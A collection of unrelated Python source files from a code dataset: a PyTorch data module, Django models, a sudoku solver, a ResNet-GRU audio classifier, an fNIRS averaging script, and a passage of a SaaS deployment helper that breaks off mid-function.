shuffle=self.train_dataloader_params.shuffle,\n )\n\n def val_dataloader(self):\n return DataLoader(\n dataset=self.data_val,\n batch_size=self.val_dataloader_params.batch_size,\n num_workers=self.val_dataloader_params.num_workers,\n pin_memory=self.val_dataloader_params.pin_memory,\n shuffle=self.val_dataloader_params.shuffle,\n )\n\n def test_dataloader(self):\n testset_2 = DIV2KDatasetPaired(root=self.data_dir, scale=2, shared_transform=self.transforms)\n testset_2 = ImplicitImageDataset(dataset=testset_2)\n\n testset_3 = DIV2KDatasetPaired(root=self.data_dir, scale=3, shared_transform=self.transforms)\n testset_3 = ImplicitImageDataset(dataset=testset_3)\n\n testset_4 = DIV2KDatasetPaired(root=self.data_dir, scale=4, shared_transform=self.transforms)\n testset_4 = ImplicitImageDataset(dataset=testset_4)\n\n test_dataloader_2 = DataLoader(\n dataset=testset_2,\n batch_size=self.test_dataloader_params.batch_size,\n num_workers=self.test_dataloader_params.num_workers,\n pin_memory=self.test_dataloader_params.pin_memory,\n shuffle=self.test_dataloader_params.shuffle,\n )\n\n test_dataloader_3 = DataLoader(\n dataset=testset_3,\n batch_size=self.test_dataloader_params.batch_size,\n num_workers=self.test_dataloader_params.num_workers,\n pin_memory=self.test_dataloader_params.pin_memory,\n shuffle=self.test_dataloader_params.shuffle,\n )\n\n test_dataloader_4 = DataLoader(\n dataset=testset_4,\n batch_size=self.test_dataloader_params.batch_size,\n num_workers=self.test_dataloader_params.num_workers,\n pin_memory=self.test_dataloader_params.pin_memory,\n shuffle=self.test_dataloader_params.shuffle,\n )\n return [test_dataloader_2, test_dataloader_3, test_dataloader_4]","sub_path":"src/datamodules/DIV2K_datamodule.py","file_name":"DIV2K_datamodule.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"118990149","text":"from django.contrib.postgres.fields import ArrayField, JSONField\nfrom django.db import models\n\n\nclass Book(models.Model):\n name = models.CharField(max_length=255)\n authors = models.ManyToManyField(\n 'library.Author',\n related_name='books',\n null=True\n )\n\n\nclass Author(models.Model):\n name = models.CharField(max_length=50)\n last_name = models.CharField(max_length=50, null=True)\n age = models.IntegerField(null=True)\n\n def __str__(self):\n return \"{} - {}\".format(\n self.name, self.age\n )\n\nimport random\n\n\ndef random_1_1000():\n return random.randint(1, 1000)\n\n\nclass TestField(models.Model):\n char_field = models.CharField(max_length=50, null=True)\n float_field = models.FloatField(\n verbose_name='My float name',\n help_text='help text',\n primary_key=False,\n null=True,\n blank=True,\n default=1.0\n )\n boolean_field = models.BooleanField(default=False)\n big_int_field = models.BigIntegerField(\n unique=True,\n null=True\n )\n positive_field = models.PositiveIntegerField(\n db_index=True,\n null=True\n )\n small_int_field = models.SmallIntegerField(\n default=random_1_1000,\n null=True\n )\n positive_small_int_field = models.PositiveSmallIntegerField(\n null=True\n )\n text_field = models.TextField(\n null=True\n )\n datetime_field = models.DateTimeField(\n null=True\n )\n date_field = models.DateField(\n null=True\n )\n time_field = models.TimeField(\n null=True\n )\n null_boolean_field = models.NullBooleanField()\n slug_field = models.SlugField(\n null=True\n )\n array_field = ArrayField(models.IntegerField(), default=list)\n json_field = JSONField(default=dict)\n\n created_at = models.DateTimeField(auto_now_add=True, null=True)\n updated_at = models.DateTimeField(auto_now=True, null=True)\n\n file_field = models.FileField(null=True)\n image_field = models.ImageField(null=True)\n binary_field = models.BinaryField(null=True)\n\n class Meta:\n verbose_name = 'my class name'\n verbose_name_plural = 'my class names'\n # ordering = ('-create_at', 'char_field')\n index_together = (\n ('date_field', 'created_at'),\n ('updated_at', 'slug_field', 'array_field')\n )\n unique_together = (\n ('date_field', 'created_at'),\n )\n\n# TestField.objects.filter(big_int_field__isnull=True)\n# TestField.objects.filter(big_int_field__range=[1, 3])\n# TestField.objects.filter()\n#\n#\n# class User(models.Model):\n# username = models.CharField(max_length=255)\n# first_name = models.CharField(max_length=255)\n# last_name = models.CharField(max_length=255)\n#\n# class Meta:\n# abstract = True\n#\n#\n# class Employee(User):\n# clothes = models.TextField()\n#\n#\n# class Manager(User):\n# salary = models.IntegerField()\n#\n# def get_salary(self):\n# return self.salary\n#\n#\n# class Boss(Manager):\n# def get_salary(self):\n# return self.salary * 10\n#\n# class Meta:\n# proxy = True\n\n","sub_path":"library/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69834733","text":"import pathlib\nimport typing as tp\n\nT = tp.TypeVar(\"T\")\n\n\ndef read_sudoku(path: tp.Union[str, pathlib.Path]) -> tp.List[tp.List[str]]:\n path = pathlib.Path(path)\n with path.open() as f:\n puzzle = f.read()\n return create_grid(puzzle)\n\n\ndef create_grid(puzzle: str) -> tp.List[tp.List[str]]:\n digits = [c for c in puzzle if c in \"123456789.\"]\n grid = group(digits, 9)\n return grid\n\n\ndef display(grid: tp.List[tp.List[str]]) -> None:\n \n width = 2\n line = \"+\".join([\"-\" * (width * 3)] * 3)\n for row in range(9):\n print(\n \"\".join(\n grid[row][col].center(width) + (\"|\" if str(col) in \"25\" else \"\") for col in range(9)\n )\n )\n if str(row) in \"25\":\n print(line)\n print()\n\n\ndef group(values: tp.List[T], n: int) -> tp.List[tp.List[T]]:\n \n return ( [values[n*k:n*(k+1)] for k in range (n)]) \n\n\ndef get_row(grid: tp.List[tp.List[str]], pos: tp.Tuple[int, int]) -> tp.List[str]:\n \n return (grid[pos[0]])\n\n\ndef get_col(grid: tp.List[tp.List[str]], pos: tp.Tuple[int, int]) -> tp.List[str]:\n \n a=[]\n for i in range (len(grid)):\n a.append(grid[i][pos[1]])\n return (a)\n\n\ndef get_block(grid: tp.List[tp.List[str]], pos: tp.Tuple[int, int]) -> tp.List[str]:\n \n a=pos[0]//3*3\n b=pos[1]//3*3\n sq=[]\n for i in range (3):\n for j in range (3):\n sq.append(grid[a+i][b+j])\n return(sq)\n\ndef find_empty_positions(grid: tp.List[tp.List[str]]) -> tp.Optional[tp.Tuple[int, int]]:\n \n for i in range (len(grid)):\n for j in range (len(grid[i])):\n if (grid[i][j]=='.'):\n return (i, j)\n return (0)\n \ndef find_possible_values(grid: tp.List[tp.List[str]], pos: tp.Tuple[int, int]) -> tp.Set[str]:\n \n a=set()\n for j in range (1,10):\n i=str(j)\n if (i not in get_block(grid, pos)) and (i not in get_row(grid, pos)) and (i not in get_col(grid, pos)):\n a.add(i) \n return(a)\n\n\ndef solve(grid: tp.List[tp.List[str]]) -> tp.Optional[tp.List[tp.List[str]]]:\n \n def check(grid: tp.List[tp.List[str]]):\n liz=find_empty_positions(grid)\n if (liz==0):\n return (True)\n else:\n sett=find_possible_values(grid, (liz[0], liz[1]))\n listt=list(sett)\n if (len(listt))==0:\n return (False)\n else:\n for i in listt:\n grid[liz[0]][liz[1]]=i\n if check(grid)==True:\n return(True)\n else:\n grid[liz[0]][liz[1]]=\".\"\n check(grid)\n return(grid) \n\ndef check_solution(solution: tp.List[tp.List[str]]) -> bool:\n \n for i in range (len(solution)):\n for j in range (len(solution)):\n ij=(i,j)\n col=set(get_col(solution, ij))\n row=set(get_row(solution, ij))\n block=set(get_block(solution, ij))\n if (len(col)!=9 or len(row)!=9 or len(block)!=9 or (\".\" in col) or (\".\" in row) or (\".\" in block) ):\n return (False)\n return (True)\n \n \n \ndef generate_sudoku(N: int) -> tp.List[tp.List[str]]:\n import random\n \n grid_dot = [[\".\" for i in range (9)] for j in range (9)]\n grid=solve(grid_dot)\n N=81-N\n while N>0:\n display(grid)\n point1=random.randint(0,8)\n point2=random.randint(0,8)\n if (grid[point1][point2]!= \".\"):\n grid[point1][point2]=\".\"\n N-=1\n return (grid)\n\n\nif __name__ == \"__main__\":\n for fname in [\"puzzle1.txt\", \"puzzle2.txt\", \"puzzle3.txt\"]:\n grid = read_sudoku(fname)\n display(grid)\n solution = solve(grid)\n if not solution:\n print(f\"Puzzle {fname} can't be solved\")\n else:\n display(solution)\n","sub_path":"homework02/sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"81577949","text":"# coding=UTF-8\n\nfrom django.contrib.staticfiles import finders\nfrom django.contrib.staticfiles.templatetags import staticfiles\nfrom django.db import models\nfrom django.utils.encoding import python_2_unicode_compatible\nfrom django.utils.formats import date_format\nfrom django.utils.timezone import now\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.dateformat import DateFormat\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\n\n\nclass PictureURL(object):\n \"\"\"\n Classe pour récuperer l'URL d'une image, ou l'URL par défaut si image vide\n \"\"\"\n @staticmethod\n def get_url(img=None, default=None):\n if img:\n return reverse_lazy('url_public', args=(img.name[2:]\n if img.name.startswith('./')\n else img.name,))\n if default:\n return staticfiles.static(default)\n return staticfiles.static('img/no-image-yet.jpg')\n\n\nclass ObjectsStillValidManager(models.Manager):\n def still_valid(self):\n return self.get_queryset().filter(date_v_fin__exact=None)\n\n def still_valid_distinct(self):\n return self.get_queryset().filter(date_v_fin__exact=None).distinct()\n\n\nclass BaseModel(models.Model):\n date_creation = models.DateTimeField(auto_now_add=True,\n verbose_name=_('Created'))\n date_last_modif = models.DateTimeField(auto_now=True,\n verbose_name=_('Last changed'))\n date_v_debut = models.DateTimeField(\n default=timezone.now,\n editable=True,\n verbose_name=_(\"V. start\")\n )\n date_v_fin = models.DateTimeField(\n default=None,\n null=True,\n editable=True,\n verbose_name=_(\"V. end\"),\n blank=True\n )\n objects = ObjectsStillValidManager()\n\n @staticmethod\n def format_date(value):\n return DateFormat(value).format('d/m/Y, H:i') if value else _('Infini')\n\n @staticmethod\n def to_str(value, default='?'):\n return str(value) if value else default\n\n \"\"\"\n Sur http://stackoverflow.com, solution pour ajouter un champ en lecture\n seule qui affiche l'image d'un champ de type models.ImageField() :\n /questions/16307307/django-admin-show-image-from-imagefield\n Seul hic, mais ça convient pour l'instant à mes besoins : il va chercher\n une propriété en dur. Moi je l'ai bêtement nommé propriété \"image\".\n \"\"\"\n def image_tag(self):\n if self.image:\n return ''.format(\n reverse_lazy('url_public', args=(self.image,))\n )\n else:\n return _('(Empty)')\n\n image_tag.short_description = 'Image'\n image_tag.allow_tags = True\n\n @staticmethod\n def date_relative(d, most_recent=None):\n if d is None:\n return _('No date')\n if most_recent is None:\n diff = now() - d\n else:\n diff = most_recent - d\n s = diff.seconds\n if diff.days > 7 or diff.days < 0:\n if d.year == now().year:\n return date_format(d, 'MONTH_DAY_FORMAT', use_l10n=True)\n return date_format(d, 'SHORT_DATE_FORMAT', use_l10n=True)\n elif diff.days == 1:\n return _(\"1 day ago\")\n elif diff.days > 1:\n return _(\"{} days ago\").format(diff.days)\n elif s <= 1:\n return _(\"Just now\")\n elif s < 60:\n return _(\"{} seconds ago\").format(s)\n elif s < 120:\n return _(\"1 minute ago\")\n elif s < 3600:\n return _(\"{} minutes ago\").format(s / 60)\n elif s < 7200:\n return _(\"1 hour ago\")\n else:\n return _(\"{} hours ago\").format(s / 3600)\n\n def date_creation_relative(self):\n return self.date_relative(self.date_creation)\n\n class Meta:\n abstract = True\n ordering = ['date_v_debut']\n\n\nclass ManyToManyStillValid(models.ManyToManyField):\n\n def all_valid(self):\n return self.all().filter(date_v_fin__null=True)\n\n\n@python_2_unicode_compatible\nclass Langue(BaseModel):\n nom = models.CharField(max_length=50)\n nom_local = models.CharField(max_length=50, default='')\n locale = models.CharField(max_length=2) # (e.g. \"fr\")\n bidirectionnel = models.BooleanField(default=False)\n active = models.BooleanField(default=False)\n\n def url_drapeau(self):\n if not self.locale:\n return None\n # path codé en dur, ça ne devrait jamais changer :\n a = 'img/flags/flag-{}-s.png'.format(self.locale)\n # ! Astuce : finder de django :\n if not finders.find(a):\n return None\n return staticfiles.static(a)\n\n def __str__(self):\n return '{} / {}{}'.format(\n self.locale, self.nom, (_(\"- activated\") if self.active else \"\")\n )\n\n class Meta(BaseModel.Meta):\n verbose_name_plural = _(\"Languages\")\n\n\nclass BaseTranslatableModel(BaseModel):\n langue = models.ForeignKey(Langue, on_delete=models.PROTECT)\n\n class Meta(BaseModel.Meta):\n abstract = True\n\n\n@python_2_unicode_compatible\nclass Texte(BaseTranslatableModel):\n texte = models.CharField(max_length=200)\n\n def __str__(self):\n return self.texte\n\n class Meta(BaseTranslatableModel.Meta):\n verbose_name = _(\"Text\")\n\n\n","sub_path":"app/models/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"122551417","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\n# pylint: disable=E1101, W0612\n\n\"\"\"\nResNet architecture adapted to 1-d case from:\nhttps://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py\n\"\"\"\n\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ntorch.set_default_tensor_type('torch.FloatTensor')\n\nclass BasicBlock(nn.Module):\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.kernel_size = 15\n self.padding = 7\n self.conv1 = nn.Conv1d(inplanes, planes, kernel_size=self.kernel_size, stride=stride, padding=self.padding, bias=False)\n self.bn1 = nn.BatchNorm1d(planes) \n self.relu = nn.ReLU(inplace=True) \n self.conv2 = nn.Conv1d(planes, planes, stride=1, kernel_size=self.kernel_size, padding=self.padding, bias=False)\n self.bn2 = nn.BatchNorm1d(planes)\n self.downsample = downsample \n self.stride = stride \n\n def forward(self, x):\n residual = x\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n out = self.conv2(out)\n out = self.bn2(out)\n if self.downsample is not None:\n residual = self.downsample(x)\n out += residual\n out = self.relu(out)\n\n return out\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, mode):\n super(ResNet, self).__init__()\n self.mode = mode #added from 3-step training of the model\n self.inplanes = 64\n self.dim = 125 #added for convenience to test different kernel parameters for conv1\n self.conv1 = nn.Conv1d(1, 64, kernel_size=80, stride=16, padding=38, bias=False)\n self.bn1 = nn.BatchNorm1d(64)\n self.relu = nn.ReLU(inplace=True)\n self.layer1 = self._make_layer(block, 64, 2)\n self.layer2 = self._make_layer(block, 128, 2, stride=2)\n self.layer3 = self._make_layer(block, 256, 2, stride=2)\n self.layer4 = self._make_layer(block, 512, 2, stride=2)\n self.fc1 = nn.Linear(512, 512)\n \n self.backend_conv1 = nn.Sequential(\n nn.Conv1d(self.dim, 2*self.dim, 5, 2, 0, bias=False),\n nn.BatchNorm1d(2*self.dim),\n nn.ReLU(True),\n nn.MaxPool1d(2, 2),\n nn.Conv1d(2*self.dim, 4*self.dim, 5, 2, 0, bias=False),\n nn.BatchNorm1d(4*self.dim),\n nn.ReLU(True),\n )\n self.backend_conv2 = nn.Sequential(\n nn.Linear(4*self.dim, self.dim),\n nn.BatchNorm1d(self.dim),\n nn.ReLU(True),\n nn.Linear(self.dim, 12)\n )\n\n for m in self.modules():\n if isinstance(m, nn.Conv1d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm1d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes:\n downsample = nn.Sequential(\n nn.Conv1d(self.inplanes, planes,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm1d(planes),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n \n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n #batch_size x features(512) x sequence_length\n x = torch.transpose(x,1,2)\n x = x.contiguous()\n bs = x.size(0)\n sl = x.size(1)\n x = x.view(bs*sl, -1)\n x = self.fc1(x)\n\n if self.mode == 1:\n x = x.view(bs, sl, 512) \n x = self.backend_conv1(x)\n x = torch.mean(x, 2)\n x = self.backend_conv2(x)\n \n else:\n x = x.view(bs, sl, 512)\n \n return x\n\nclass GRU(nn.Module):\n\n def __init__(self, num_features = 512, num_layers = 2):\n super(GRU, self).__init__()\n self.gru = nn.GRU(512, hidden_size = num_features, num_layers = num_layers, bidirectional = True, batch_first = True)\n self.fc2 = nn.Linear(num_features*2, 12)\n\n def forward(self, x):\n x, _ = self.gru(x)\n x = self.fc2(x[:, -1, :]) \n return x\n\nclass Network(nn.Module):\n def __init__(self, num_features = 512, num_layers = 2, mode = 0):\n super(Network, self).__init__()\n self.mode = mode\n self.resnet = ResNet(BasicBlock, mode = mode)\n self.gru = GRU(num_features=num_features, num_layers=num_layers)\n\n def forward(self, x):\n x = x.type(torch.FloatTensor).unsqueeze(1).to(DEVICE)\n x = self.resnet(x)\n if self.mode != 1:\n x = self.gru(x)\n return x\n\ndef accuracy(model, dataset, filename, batchsize=2):\n \"\"\"\n Computes overall accuracy on the dataset provided\n \"\"\"\n total, correct = 0, 0\n model.eval()\n dataloader = DataLoader(dataset, batch_size = batchsize, drop_last = False)\n\n with torch.no_grad():\n for i_batch, batch in enumerate(dataloader):\n outputs = model(batch['audio'])\n _, predicted = torch.max(outputs.data, 1)\n total += batchsize\n correct += (predicted == batch['label'].to(DEVICE)).sum().item()\n\n with open(filename, 'a') as f:\n f.write(str(100 * correct / float(total))+'\\n')\n model.train()\n return(100*correct/float(total))\n\ndef class_accuracy(model, dataset, filename, batchsize=2):\n \"\"\"\n Computes per class accuracy on the dataset provided\n \"\"\"\n labels = ['yes','no','up','down','left','right','on','off','stop','go','unknown','silence']\n class_correct = list(0. for i in range(12))\n class_total = list(0. for i in range(12))\n model.eval()\n dataloader = DataLoader(dataset, batch_size = batchsize, drop_last = False)\n with torch.no_grad():\n for i_batch, batch in enumerate(dataloader):\n outputs = model(batch['audio'])\n _, predicted = torch.max(outputs.data, 1)\n c = (predicted == batch['label'].to(DEVICE)).squeeze()\n\n for i in range(batchsize):\n label = batch['label'][i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n with open(filename, 'w') as myFile:\n for i in range(12): \n myFile.write('Accuracy of %5s : %2d %%' % (\n labels[i], 100 * class_correct[i] / class_total[i])+'\\n')\n model.train()","sub_path":"models/model_resnet_bgru.py","file_name":"model_resnet_bgru.py","file_ext":"py","file_size_in_byte":6945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"652407565","text":"#coding:utf-8\n\n# from module.emg_processing import window_rms\nfrom module.import_data import Import_data\nfrom module.delete_data import Delete_data\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport numpy as np\nimport pylab\nimport csv\n\n\"\"\"\nt検定の準備\n\"\"\"\n# データが格納されている作業ディレクトリまでパス指定\nos.chdir(\"/Users/chiaki/Desktop/\")\n\nprint('読み込むファイル名を入力してください')\nfile_name = input()\n\nresult_f = pd.DataFrame(columns=[])\nset_time = int(40)\n\n# ---ファイル読み込み---\ndf = pd.read_csv(file_name + '.csv', sep=',')\ndf.columns = ['index', 'index2','time','ch1_oxy', 'ch1_deoxy',\n 'ch2_oxy', 'ch2_deoxy', 'ch3_oxy', 'ch3_deoxy',\n 'ch4_oxy', 'ch4_deoxy', 'ch5_oxy', 'ch5_deoxy',\n 'ch6_oxy', 'ch6_deoxy', 'ch7_oxy', 'ch7_deoxy',\n 'ch8_oxy', 'ch8_deoxy', 'ch9_oxy', 'ch9_deoxy',\n 'ch10_oxy', 'ch10_deoxy', 'ch11_oxy', 'ch11_deoxy',\n 'ch12_oxy', 'ch12_deoxy', 'ch13_oxy', 'ch13_deoxy',\n 'ch14_oxy', 'ch14_deoxy', 'ch15_oxy', 'ch15_deoxy',\n 'ch16_oxy', 'ch16_deoxy', 'ch17_oxy', 'ch17_deoxy',\n 'ch18_oxy', 'ch18_deoxy', 'ch19_oxy', 'ch19_deoxy',\n 'ch20_oxy', 'ch20_deoxy', 'ch21_oxy', 'ch21_deoxy',\n 'ch22_oxy', 'ch22_deoxy', 'ch23_oxy', 'ch23_deoxy',\n 'ch24_oxy', 'ch24_deoxy', 'ch25_oxy', 'ch25_deoxy',\n 'ch26_oxy', 'ch26_deoxy', 'ch27_oxy', 'ch27_deoxy',\n 'ch28_oxy', 'ch28_deoxy', 'ch29_oxy', 'ch29_deoxy',\n 'ch30_oxy', 'ch30_deoxy', 'ch31_oxy', 'ch31_deoxy',\n 'ch32_oxy', 'ch32_deoxy', 'ch33_oxy', 'ch33_deoxy',\n 'ch34_oxy', 'ch34_deoxy', 'ch35_oxy', 'ch35_deoxy',\n 'ch36_oxy', 'ch36_deoxy', 'ch37_oxy', 'ch37_deoxy',\n 'ch38_oxy', 'ch38_deoxy', 'ch39_oxy', 'ch39_deoxy',\n 'ch40_oxy', 'ch40_deoxy', 'ch41_oxy', 'ch41_deoxy',\n 'ch42_oxy', 'ch42_deoxy', 'ch43_oxy', 'ch43_deoxy',\n 'ch44_oxy', 'ch44_deoxy', 'ch45_oxy', 'ch45_deoxy',\n 'ch46_oxy', 'ch46_deoxy', 'ch47_oxy', 'ch47_deoxy',\n 'ch48_oxy', 'ch48_deoxy', 'ch49_oxy', 'ch49_deoxy',\n 'ch50_oxy', 'ch50_deoxy', 'ch51_oxy', 'ch51_deoxy',\n 'ch52_oxy', 'ch52_deoxy', 'ch53_oxy', 'ch53_deoxy',\n 'ch54_oxy', 'ch54_deoxy', 'ch55_oxy', 'ch55_deoxy',\n 'ch56_oxy', 'ch56_deoxy', 'ch57_oxy', 'ch57_deoxy',\n 'ch58_oxy', 'ch58_deoxy', 'ch59_oxy', 'ch59_deoxy',\n 'ch60_oxy', 'ch60_deoxy', 'ch61_oxy', 'ch61_deoxy',\n 'ch62_oxy', 'ch62_deoxy', 'ch63_oxy', 'ch63_deoxy',\n 'ch64_oxy', 'ch64_deoxy', 'ch65_oxy', 'ch65_deoxy',\n 'ch66_oxy', 'ch66_deoxy', 'ch67_oxy', 'ch67_deoxy',\n 'ch68_oxy', 'ch68_deoxy',\n ]\n\n\nfor i in range(68):\n rest_ave_box = []\n task_ave_box = []\n for j in range(5):\n time_1 = int((j*set_time+4)/0.057)\n time_2 = int((j*set_time+10)/0.057 + 1)\n time_3 = int((j*set_time+14)/0.057)\n time_4 = int((j*set_time + 24) / 0.057 + 1)\n\n rest_ave = sum(df[time_1:time_2]['ch'+ str(i+1) + '_oxy'])/len(df[time_1:time_2]['ch'+ str(i+1) + '_oxy'])\n task_ave = sum(df[time_3:time_4]['ch' + str(i + 1) + '_oxy']) / len(df[time_3:time_4]['ch' + str(i + 1) + '_oxy'])\n rest_ave_box.append(rest_ave)\n task_ave_box.append(task_ave)\n result_f['ch'+ str(i+1) + '_rest'] = rest_ave_box\n result_f['ch' + str(i + 1) + '_task'] = task_ave_box\n\n# print(result_f)\n\n# ---書き出し---\nresult_f.to_csv(\"t_10s_\" + file_name + \".csv\")\nprint('OK')\n","sub_path":"Analysis/t_1.py","file_name":"t_1.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"588892810","text":"import os\nimport yaml\nimport json\nimport logging\n\nfrom github import Github\nfrom sretoolbox.container import Image\nfrom sretoolbox.utils import retry\n\nimport utils.threaded as threaded\nimport utils.secret_reader as secret_reader\n\nfrom utils.oc import OC, StatusCodeError\nfrom utils.openshift_resource import OpenshiftResource as OR\nfrom utils.state import State\nfrom reconcile.github_org import get_config\n\n\nclass SaasHerder():\n \"\"\"Wrapper around SaaS deployment actions.\"\"\"\n\n def __init__(self, saas_files,\n thread_pool_size,\n gitlab,\n integration,\n integration_version,\n settings,\n accounts=None):\n self.saas_files = saas_files\n self._validate_saas_files()\n if not self.valid:\n return\n self.thread_pool_size = thread_pool_size\n self.gitlab = gitlab\n self.integration = integration\n self.integration_version = integration_version\n self.settings = settings\n self.namespaces = self._collect_namespaces()\n if accounts:\n self._initiate_state(accounts)\n\n def _validate_saas_files(self):\n self.valid = True\n saas_file_name_path_map = {}\n for saas_file in self.saas_files:\n saas_file_name = saas_file['name']\n saas_file_path = saas_file['path']\n saas_file_name_path_map.setdefault(saas_file_name, [])\n saas_file_name_path_map[saas_file_name].append(saas_file_path)\n\n saas_file_owners = [u['org_username']\n for r in saas_file['roles']\n for u in r['users']]\n if not saas_file_owners:\n msg = 'saas file {} has no owners: {}'\n logging.warning(msg.format(saas_file_name, saas_file_path))\n\n duplicates = {saas_file_name: saas_file_paths\n for saas_file_name, saas_file_paths\n in saas_file_name_path_map.items()\n if len(saas_file_paths) > 1}\n if duplicates:\n self.valid = False\n msg = 'saas file name {} is not unique: {}'\n for saas_file_name, saas_file_paths in duplicates.items():\n logging.error(msg.format(saas_file_name, saas_file_paths))\n\n def _collect_namespaces(self):\n # namespaces may appear more then once in the result\n namespaces = []\n for saas_file in self.saas_files:\n managed_resource_types = saas_file['managedResourceTypes']\n resource_templates = saas_file['resourceTemplates']\n for rt in resource_templates:\n targets = rt['targets']\n for target in targets:\n namespace = target['namespace']\n # managedResourceTypes is defined per saas_file\n # add it to each namespace in the current saas_file\n namespace['managedResourceTypes'] = managed_resource_types\n namespaces.append(namespace)\n return namespaces\n\n def _initiate_state(self, accounts):\n self.state = State(\n integration=self.integration,\n accounts=accounts,\n settings=self.settings\n )\n\n @staticmethod\n def _collect_parameters(container):\n parameters = container.get('parameters') or {}\n if isinstance(parameters, str):\n parameters = json.loads(parameters)\n # adjust Python's True/False\n for k, v in parameters.items():\n if v is True:\n parameters[k] = 'true'\n elif v is False:\n parameters[k] = 'false'\n elif any([isinstance(v, t) for t in [dict, list, tuple]]):\n parameters[k] = json.dumps(v)\n return parameters\n\n @retry()\n def _get_file_contents(self, options):\n url = options['url']\n path = options['path']\n ref = options['ref']\n github = options['github']\n if 'github' in url:\n repo_name = url.rstrip(\"/\").replace('https://github.com/', '')\n repo = github.get_repo(repo_name)\n f = repo.get_contents(path, ref)\n return f.decoded_content, f.html_url\n elif 'gitlab' in url:\n if not self.gitlab:\n raise Exception('gitlab is not initialized')\n project = self.gitlab.get_project(url)\n f = project.files.get(file_path=path, ref=ref)\n html_url = os.path.join(url, 'blob', ref, path)\n return f.decode(), html_url\n\n def _get_commit_sha(self, options):\n url = options['url']\n ref = options['ref']\n github = options['github']\n hash_length = options.get('hash_length')\n commit_sha = ''\n if 'github' in url:\n repo_name = url.rstrip(\"/\").replace('https://github.com/', '')\n repo = github.get_repo(repo_name)\n commit = repo.get_commit(sha=ref)\n commit_sha = commit.sha\n elif 'gitlab' in url:\n if not self.gitlab:\n raise Exception('gitlab is not initialized')\n project = self.gitlab.get_project(url)\n commits = project.commits.list(ref_name=ref)\n commit_sha = commits[0].id\n\n if hash_length:\n return commit_sha[:hash_length]\n\n return commit_sha\n\n @staticmethod\n def _get_cluster_and_namespace(target):\n cluster = target['namespace']['cluster']['name']\n namespace = target['namespace']['name']\n return cluster, namespace\n\n def _process_template(self, options):\n saas_file_name = options['saas_file_name']\n resource_template_name = options['resource_template_name']\n url = options['url']\n path = options['path']\n hash_length = options['hash_length']\n target = options['target']\n parameters = options['parameters']\n github = options['github']\n target_ref = target['ref']\n environment = target['namespace']['environment']\n environment_parameters = self._collect_parameters(environment)\n target_parameters = self._collect_parameters(target)\n\n consolidated_parameters = {}\n consolidated_parameters.update(environment_parameters)\n consolidated_parameters.update(parameters)\n consolidated_parameters.update(target_parameters)\n\n try:\n get_file_contents_options = {\n 'url': url,\n 'path': path,\n 'ref': target_ref,\n 'github': github\n }\n content, html_url = \\\n self._get_file_contents(get_file_contents_options)\n except Exception as e:\n logging.error(\n f\"[{url}/{path}:{target_ref}] \" +\n f\"error fetching template: {str(e)}\")\n return None, None\n\n template = yaml.safe_load(content)\n if \"IMAGE_TAG\" not in consolidated_parameters:\n for template_parameter in template['parameters']:\n if template_parameter['name'] == 'IMAGE_TAG':\n # add IMAGE_TAG only if it is required\n get_commit_sha_options = {\n 'url': url,\n 'ref': target_ref,\n 'hash_length': hash_length,\n 'github': github\n }\n image_tag = self._get_commit_sha(get_commit_sha_options)\n consolidated_parameters['IMAGE_TAG'] = image_tag\n oc = OC('server', 'token')\n try:\n resources = oc.process(template, consolidated_parameters)\n except StatusCodeError as e:\n resources = None\n logging.error(\n f\"[{saas_file_name}/{resource_template_name}] {html_url}: \" +\n f\"error processing template: {str(e)}\")\n return resources, html_url\n\n def _collect_images(self, resource):\n images = set()\n # resources with pod templates\n try:\n template = resource[\"spec\"][\"template\"]\n for c in template[\"spec\"][\"containers\"]:\n images.add(c[\"image\"])\n except KeyError:\n pass\n # init containers\n try:\n template = resource[\"spec\"][\"template\"]\n for c in template[\"spec\"][\"initContainers\"]:\n images.add(c[\"image\"])\n except KeyError:\n pass\n # CronJob\n try:\n template = resource[\"spec\"][\"jobTemplate\"][\"spec\"][\"template\"]\n for c in template[\"spec\"][\"containers\"]:\n images.add(c[\"image\"])\n except KeyError:\n pass\n # CatalogSource templates\n try:\n images.add(resource[\"spec\"][\"image\"])\n except KeyError:\n pass\n\n return images\n\n def _check_images(self, options):\n saas_file_name = options['saas_file_name']\n resource_template_name = options['resource_template_name']\n html_url = options['html_url']\n resource = options['resource']\n image_auth = options['image_auth']\n image_patterns = options['image_patterns']\n error_prefix = \\\n f\"[{saas_file_name}/{resource_template_name}] {html_url}:\"\n error = False\n images = 